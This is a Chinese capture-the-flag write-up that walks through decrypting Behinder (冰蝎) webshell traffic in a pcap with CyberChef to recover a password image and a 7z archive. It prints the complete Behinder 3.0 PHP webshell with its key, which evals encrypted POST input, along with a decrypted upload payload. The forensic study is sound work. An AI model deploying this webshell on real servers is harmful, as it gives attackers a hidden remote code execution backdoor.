NewGrating

流量分析题

拿到附件，首先看到了文件为蝎子.pcapng很显然给了我们提示，大概率是冰蝎Behinder的流量分析

文件总体不大就4667个分组

我首先过滤了http流就在第一个流stream 0中发现传了个webshell

<?php
@error_reporting(0);
session_start();
    // $key="e45e329feb5d925b"; //........................32...md5.........16........................rebeyond
    $key="e46023a69f8db309"; //DASCTF
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

这是很经典的冰蝎3.0加密算法特征，key给我们了就是e46023a69f8db309密码是DASCTF我们也可以验证一下，冰蝎的AES密钥key为连接密码的md5前16位

1 2	❯ echo -n "DASCTF" \|md5sum\|awk '{print substr ($0,1,16)}' e46023a69f8db309

那就尝试找到传完webshell后执行命令的包

我们直接将请求包中的密文copy下来，拿到这加密后的文本那我们咋如何解密呢？

这就又用到经典厨师了CyberChef，先将密文base64解码后再进行AES 128解密，其中的key就填入上文获取到的key，冰蝎的默认初始化向量(IV)是0123456789abcdef也是16位和key相同

这样我们就得到了解密后的文本，不过这个文本需要再次进行``base64`解码，将括号内的文本再次解密后得到最终的内容

不过没什么价值，我们继续跟踪流，在追踪到流stream 4时发现除了第一段的请求包，其他段的请求包内容都异常的大，很难用鼠标慢慢复制下来，我们可以使用wiresahrk的另存为功能，单独将ip为225.1发给225.129的对话保存下来

这边我利用Visual Studio Code打开，虽然还是有点卡卡的，找到第二段从第25行开始到结束

这边有个小技巧就是在行的开头按住shift键再按两下End键即可全部选中25行的内容，不过需要删除末尾留存的POST ....

再次copy到CyberChef二次解密后得到内容

1
2

$mode="dXBkYXRl";$mode=base64_decode($mode);$path="L3d3dy9hZG1pbi93d3cud2Vic2hlbGwuY29tXzgwL3d3d3Jvb3QvdXBsb2FkL1Bhc3N3b3JkLnBuZw==";$path=base64_decode($path);$hash="";$blockIndex="MA==";$blockIndex=base64_decode($blockIndex);$blockSize="MzA3MjA=";$blockSize=base64_decode($blockSize);$content="aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQWxnQUFBRXNDQVlBQUFBZlBjMldBQUFQcTBsRVFWUjRuTzNkMjVLck5nSUYwRDVUOC8rLzNGT25VbDNUNVdBc3BLMGJyUFdTeEdrYkxDU3hFVUwrOC8zOS9mMEZBRURNZnhRbEFFQ1dnQVVBRUNaZ0FRQ0VDVmdBQUdFQ0ZnQkFtSUFGQUJBbVlBRUFoQWxZQUFCaEFoWUFRSmlBQlFBUUptQUJBSVFKV0FBQVlRSVdBRUNZZ0FVQUVDWmdBUUNFQ1ZnQUFHRUNGZ0JBbUlBRkFCQW1ZQUVBaEFsWUFBQmhBaFlBUUppQUJRQVFKbUFCQUlRSldBQUFZUUlXQUVDWWdBVUFFQ1pnQVFDRUNWZ0FBR0VDRmdCQW1JQUZBQkFtWUFFQWhBbFlBQUJoQWhZQVFKaUFCUUFRSm1BQkFJUUpXQUFBWVFJV0FFQ1lnQVVBRUNaZ0FRQ0VDVmdBQUdFQ0ZnQkFtSUFGQUJBbVlBRUFoQWxZQUFCaEFoWUFRSmlBQlFBUUptQUJBSVFKV0FBQVlRSVdBRUNZZ0FVQUVDWmdBUUNFQ1ZnQUFHRUNGZ0JBbUlBRkFCQW1ZQUVBaEFsWUFBQmhBaFlBUUppQUJRQVFKbUFCQUlRSldBQUFZUUlXQUVDWWdBVUFFQ1pnQVFDRUNWZ0FBR0VDRmdCQW1JQUZBQkFtWUFFQWhBbFlBQUJoQWhZQVFKaUFCUUFRSm1BQkFJUUpXQUFBWVFJV0FFQ1lnQVVBRUNaZ0FRQ0VDVmdBQUdFQ0ZnQkFtSUFGQUJBbVlBRUFoQWxZQUFCaEFoWUFRSmlBQlFBUUptQUJBSVFKV0FBQVlRSVdBRUNZZ0FVQUVDWmdBUUNFQ1ZnQUFHRUNGZ0JBbUlBRkFCQW1ZQUVBaEFsWUFBQmhBaFlBUUppQUJRQVFKbUFCQUlRSldBQUFZUUlXQUVDWWdBVUFFQ1pnQVFDRUNWZ0FBR0VDRmdCQW1JQUZBQkFtWUFFQWhBbFlBQUJoQWhZQVFKaUFCUUFRSm1BQkFJUUpXQUFBWVFJV0FFQ1lnQVVBRUNaZ0FRQ0VDVmdBQUdFQ0ZnQkFtSUFGQUJBbVlBRUFoQWxZQUFCaEFoWUFRSmlBQlFBUUptQUJBSVFKV0FBQVlRSVdBRUNZZ0FVQUVDWmdBUUNFQ1ZnQUFHRUMxZ0wrL1BuamUyem9hZC8zU0drWktDdmdhUVFzWXI2L3YvLzFVVTZzYlpUZlozL0xTRG5sSmN2VThlR0pCQ3dBNEpGNmh2OXRBdFpSSWFSZjR6NGNYM3I1cVZ1LzY1ajZ4cTVLejZNcjJhVzlSUUxXcmtGbjlmMSt0OTNYMTNYdTY5ZTNsWTdSRG0xekZ5UGJvb3ZNZVdiMTl5dnBkVUh4cVc3dVBNOXoyZ2hXYThld1lzZXkra2tVWmRYaXFOMGR6YnNidVQ4anQzRjFlK29WcTltNVR1NjQ3MXZQd2ZyZHVmOFUvbEdIWC9MYUV6cERIWDQ1WmJXVzNzZkRTQkNmckg3c2Q2aWJuL1ludmIrenYzOTF3TnB4eUZSSFdDZDlvbkdTYXJOYnB6bVNldlNQdTRUREhZL25uZXZnMFMzeGxXNWRyM1liUFRLQ1ZUcHFWUHJlbEpyQ3FSMEJHMldsZlZuWjN6SlJWdVZXS3F0VlQxQS81WEZXVmovL2ZQY2QwdCt0cGIvU0Z0NjdjL0FzZWUvSXVsRlROM2VwdTh2Y0l2eDcwRnM3aG5USGNxVVNweWVrdDZidWtsdWdUN3ZhZi9kOVYybXNSL3UzV2tleTB2Nms5K1ZxZTNnWDRqKzlaM1ZHQWUraDlEaXVNQmlTMk82S2JjczZXQTlYZXpVejRqWDRYZDlHbi9oYlIzM1U2V3VlZEd1Tlo3aE53UG8wTkYvNi9zUStBSi90c094QVNadmVwZDIzN0tlQU1PODJhOHRJMU90cnJmdDc5SGt0STB5dFpUcGpnT0FLSTFnUDh2UUFtRDdCUEwwOFY3VHlNVmt4cEtqRHd1TklSMC8rbDZxcHE3UHJ0NEFWa3A3bzc3YmNYSDVYc1Y3cjNNVTcwTGFlYTBSZnEzN3RRY0NDRzdqVGtpWk9Ibk1wLzN1WHdjcmY3VzdsSGcxWXJ2Q3ZtMVZtSTdmYjZ5Y1dWcFNjRzFUNmhPZ3NWNzVYeTJLL1R4cDl2Y3ZUdm1mNzNGcHZ6ajV2cGZJYmNkSGpuTHMySTFpTnJsVDZsaVVhU3Y1MjluWmZsNlU0VzRTdVpyL1RpOXFOR3ZXcHVkMDRzK01zMmZhb2hZWXRoRm0yN2Q5dGNNUjJTOXA1emY2Y3RkdWY3Y3d1ODk1clVQWDZySnB0ejdvUVgvSHphZ2hZRjZ3MHQ2UkhhRnBsdTZzM3RCNmZWekl5bFRxSnpkN0cwZWZkYlpTbTV2MmxvejQ3Qk04alYwYTFTa04rYlgwdEtjUFpBYWJsZ3JlbW4wN1VxZEhucGRiVkEzcXJEbGp1MHgrN3k1RHQxU3ZpMVBkZWZSajhqbGRaUDBhRnF4WXp3c1d1YmJySENUTjVrWG1YZGoyaW5HdTJjWGFPWHVrQ2VPUjJSKys3RWF3MzByZEpydHcrNnUxMXRPVHNlNXo5M2V0L3Y1c3I4L3NxWTlTNktWZm43YXc0NHRaempaaFpJNkJubjFuNjQrMmZQbXZIRWIwZnJ3dXFybnhTZVQxR0l5OCt6dXBRU2IrVTNyY2VGNWl6MW1Celd6NUh3R3AwWlJKbTd6Q1ZYa1N1NW4zdi92MUlJdFQwQ2dDOWJpR1VualRPVGxycEUzQ3QxZXR6alJVNjc5TEZJV2Y5WHR5VkJTMlQrL2p1NGl5OW1PYW5mV2o1MjVhMW5ONjl0N1RPN3JpT1ZJc1Y5cjFid0pwNWhkekRsZjFNWDlHMWpKUzFOUEtXVWJ3cjJ5MHRyOW1ySnRkdS80NVhoSGRjMTZkMUgwWWQ1N05SNEIxT2lHZjdlSFgvZTMzZmtqbVJzeVgyNzhvRmNhMmVBYkQzdnJlNjdRaFdhMmRYRzB3K1hXMmtLa0x0bFZSclpVOWRMVjRwbjVVYVR5S2MvdTY4UzIrWlh1M3dXMFBUMlhHK09vS1dEQjVYYmpFbnQvbmJqTUQ4NlR2dlBOSlFjbUYxbDdtdHRWWUpuaW16OW0vMGRwY09XS3RmSlk4OFdDdk14VmloMGM0WUZmenFzQ3IvMGQvVXppWDdGRHA2SHZmV0M1SFMvLy91VnVtc1FENnFMYXgyb3J4U0YxcEM0YXo1UjFlVXp2KzdPayt3UjN0OWVrQ2RaYnNSckpVclN2clIweEZtakFpa3BXOHRYcDAvTXV2dldxVDNlUVZYOTdYblpQaFIvVlRpaEQ3RDBmNk1ta3QxTkkzaXlsemFJeXVNY3I1VFV0WTl0a0hIZ0xWYkI2NkM5RFdpZkd0SHBlNTY3SHUwclpxSi9WZmYxM0xiY2VWUjJ0MHZaTzRrUGZtK3hZZ0FsRFI3THV4T1BFWFkyYnVybzk0VmFKVW56YzcwbnRTNHc1WDhLcFRWTWFIb09XcnF1ell5em81dDhUWUI2OTBqOEMzM3Y4OUdPR1kxckUvN012cjI0cnY5dVByYUp6cXlkWTJZZ0x0eTUzbzJtcWJlMWxGdWN5WDc4cDNueXJWYUptQ3QxSUhXRE5uV0hweWpUdmhLV0N6ZGw5WUt0VXNvMm5FZTNHeTdmdGZlKzMxbFl2MkkvU25kNXVwUDRyNjZVLzFMSEEranB2KzNlOUNlRXJDdXpKOXc2K0pZNjJQNExZR3d0eFhtRHRWODNoTTZ4anM5b2JlaTFucTY0bHpISGJYVXdkM0xaL1duRUhmcUgyNDlCNnQycmFqVzdmV2FnTHVTMTdWcGZ1YWFmUXJFUHlNQXM0SmE3WEZPaldxT1dDcWs1OEtoTG03S21BaWNkL2FrNXRuREZEdGVwUGRhQW9LeGJoV3dlZzNQbnIwMk9paVU3a3ROQjMvMCtITE4rNmdyTTUzcXZub0dxaDJPclZHdGU0Mjg3bmFiK2N6TTIraTNDVmdqcnhoYkhpTS9VcnB3Wk8zU0Y2MmZSN203alZJK1dZK091ZllpYUZhOVdyRU9KS1k2dkRycTI1TVhOenVzUStaaUxtK3BnTlVyYVNZcVJLOEtPV09pN29qUFBac01mRGJVdjVxejIzdzdkelM3ZDZaUEQzL3YzS1ZjZHBucjErdmhwOVZwZjJXMkdjRmE2WUIrQ24wclBXWFVVL29wbXFjdk9udUhKOEptV3UxazFuTTVpanZlTnJ3YSttZjJQNzNiNEYzNzFpTjNmbURJUXFPTlpsV0UxdTNXZHVTanRyc3I0ZWVZY3NuYnRlKzVPK1hERHdIckRmZVorVVJIZWt6YmFhUDhqdlVjM2J2amlOSFZxU2wzSFNHYlNjQXF0RU9GYk8yQWF2ZnA2blpYYjR5amxwR1lTV2U2ajNjUHFheEVuV2lqL081SndMcmd5WTBndGQ3UzZwNHlmdzVXVXhQd2QxeHZyRWUvbVN5SDBYT2k3dHkzVGc5WTZaK0VhVGxZaHViM00rSkpvS1E3cmlpdjNkeGZ5ekZXUDlvOHVmeDJ2N0EzZ25WenUweUVUVGFhVmE0NGpYcnRSUkM0cHFWK2F4dkg3ckFFVEl1N2ZlOW93TkpvNkMxVng5VFZPc29Oc25ac1V5NUd5blFid2JxeTZ2bXJwM2ZpaHVQL01mcTd6Q3c3eDd5Y3pwMnZEcXU0TTlhTzgrZXUydTRXNGF6d3BSR2VVejcvS0NtSFhWYXA3dVZ2R2QyeHZ1ejBDd1VyV2FYTlBFRk5uVlNQNjBVQ1Zzc0JXUDIzcnA2azVmY1RWeWx6SGZGYVBpMHhjUGVuVTEvbjFLaWZheklLVEE5RFI3QjBMdjgyNG9kQ2E5Ly84M3VDVjk3ZjYyOWJ0dlBWcWU3cHBJNzFmbVI4cEo3YmIzbGFPdkczSloreGVoMC9HelU4Vys5dng3WjdwYjZjL2FqNGFqOVkvV2wva3UxazlISGY1aGJoV2NIczBsaEs5L011OTZhUEd2blozTHpXZmVwWmJqM0txN1JqK2ZUYWFMTitRUHhkV2Z4SUhQL2FUcnIzZktBcnI5ZSt0dEk4d09SZGtUdk81U3pwQjM2WHcxbjk2Vm1mZTlubGRueTNnRFY3bnNuTTBiS1pCN3VtYytteERFSDZLbmlGdGFyT3JncDdiSy8yNzBaLzFnZzl5djcxYzFaWlRMSGtiMU9qTUtYbFduS3k3cTAwVENUTWJoOHIxWmRkN3p5dDBNZE5HY0c2eXdHYmNXSk1mT2JWOHY4OSt2U3VERW9iK2Ruck05Zk9ldFg3WjRPTzNsYzc4bkNIVysrcFl6bnE5cytkYnpHTk5ycXRsU3JwNzBzZjJCaXhabGpMU05UdmR2TnBlNzB1TkhmNHZLc2lBV3ZHMWNNcUo1WGF3UEg3NzBwUG9wL0s1ZDJ3OGJ2R2MzYWlIajN2NCt5elV2T3QwbGR3TlhXdzlmY2lhejZ2NWJjaVcrYnYxZTdUNzBCL3BSMzFVanR5OG1tZlN2YzVQWm94NnJOR2poQmVWZnR6T3lWMThxdFRtRTNVbDlSRjdNemJzRHN0Y1B2WWxkdy9OWlFlbmNQVlJyM0Q3eitkbGRQUk50Nk5WaDAxMEpZVFM3ckJmM29hcnVUOVYxODdLcXZhMGI1UCs5S2k5THU5YWgySkd4RW1Sb2Vicy8yb3FVTlgzL3Y2ZXZMaTRreHRmL3Z1ZmJVQjZsMDUxZGJOMm5LL3VwM2F6MHJWNzBTL1ZMUGRtcjlMdmEvRU5nRnJwOXNncXcrYjl0cHU2ZFZPN2VlL2UrK2R5N3MydlBTVUh0a29mVTlyeUMzZFRzM2Z6RGdtcTlmVEVkdGQ4Yk5YUFZmOURrR2xGOEtyS2dua0szeUgvL2Jld0lncm9OVUR5T3FwZnZWYkZTTzJrYTZuNmJJYUZTSlh1cTNUT29yUjA4dzJYZnRaZHdwR3Zkdk1xTDV1cFZHWEdlZVVkMys3NG1oVWpUL2ZDMGJWMHZ2Y3E3dkw5eWpWOG4yVjFWcWZOMnVmbjFZUGdQdGFNbUFCNjlreEZBTE1JbUFCQUlROTlpbENBSUJlQkN3QWdEQUJDd0FnVE1BQ0FBZ1RzQUFBd2dRc0FJQXdBUXNBSUV6QUFnQUlFN0FBQU1JRUxBQ0FNQUVMQUNCTXdBSUFDQk93QUFEQ0JDd0FnREFCQ3dBZ1RNQUNBQWdUc0FBQXdnUXNBSUF3QVFzQUlFekFBZ0FJRTdBQUFNSUVMQUNBTUFFTEFDQk13QUlBQ0JPd0FBRENCQ3dBZ0RBQkN3QWdUTUFDQUFnVHNBQUF3Z1FzQUlBd0FRc0FJRXpBQWdBSUU3QUFBTUlFTEFDQU1BRUxBQ0JNd0FJQUNCT3dBQURDQkN3QWdEQUJDd0FnVE1BQ0FBZ1RzQUFBd2dRc0FJQXdBUXNBSUV6QUFnQUlFN0FBQU1JRUxBQ0FNQUVMQUNCTXdBSUFDQk93QUFEQ0JDd0FnREFCQ3dBZ1RNQUNBQWdUc0FBQXdnUXNBSUF3QVFzQUlFekFBZ0FJRTdBQUFNSUVMQUNBTUFFTEFDQk13QUlBQ0JPd0FBRENCQ3dBZ0RBQkN3QWdUTUFDQUFnVHNBQUF3Z1FzQUlBd0FRc0FJRXpBQWdBSUU3QUFBTUlFTEFDQU1BRUxBQ0JNd0FJQUNCT3dBQURDQkN3QWdEQUJDd0FnVE1BQ0FBZ1RzQUFBd2dRc0FJQXdBUXNBSUV6QUFnQUlFN0FBQU1JRUxBQ0FNQUVMQUNCTXdBSUFDQk93QUFEQ0JDd0FnREFCQ3dBZ1RNQUNBQWdUc0FBQXdnUXNBSUF3QVFzQUlFekFBZ0FJRTdBQUFNSUVMQUNBTUFFTEFDQk13QUlBQ0JPd0FBRENCQ3dBZ0RBQkN3QWdUTUFDQUFnVHNBQUF3Z1FzQUlBd0FRc0FJRXpBQWdBSUU3QUFBTUlFTEFDQU1BRUxBQ0JNd0FJQUNCT3dBQURDQkN3QWdEQUJDd0FnVE1BQ0FBZ1RzQUFBd2dRc0FJQXdBUXNBSUV6QUFnQUlFN0FBQU1JRUxBQ0FNQUVMQUNEcDYrdnJmMDJLbTFYVlNKVmZBQUFBQUVsRlRrU3VRbUND";$content=base64_decode($content);$charset="";$newpath="";$createTimeStamp="";$accessTimeStamp="";$modifyTimeStamp="";
main($mode,$path,$hash,$blockIndex,$blockSize,$content,$charset,$newpath,$createTimeStamp,$accessTimeStamp,$modifyTimeStamp);

内容中有个content我们需要再次进行base64解码，其实其他的变量你也可以尝试base64解码

类如我解码了path变量得到一个关键信息，得知应该是一张含有Password的图片

解密content果然得到一张图片，但密码信息是隐含的

我们再次尝试跟踪流stream 4剩余段，在Visual Studio Code第61行中的密文解密后的内容中发现了content解码后含有7z有关信息，是个压缩包，大概率上图的Password对应的就是下面压缩包的密码

$content="TjNxOHJ5Y2NBQVRxLzdOWU1BQUFBQUFBQUFCcUFBQUFBQUFBQUdIOTN1SjRGaG1xUGJtb2lBOVVyblkzQjAxTU0vQkdqZFJDN2NwK0VzSTg4Uk9UZ0R0QTdpOGpXWGkzSGl4MWFpTkNpRm9CQkFZQUFRa3dBQWNMQVFBQ0pBYnhCd0VTVXcrNkZKa29NL1RPTkFPZlAxVXk3dGVmSVNFQkFBRUFEREFzQUFnS0FVSnpRYUFBQUFVQkdRRUFFUk1BWmdCc0FHRUFad0F1QUhRQWVBQjBBQUFBR1FBVUNnRUFvaENQWEM1cTJRRVZCZ0VBSUFBQUFBQUE="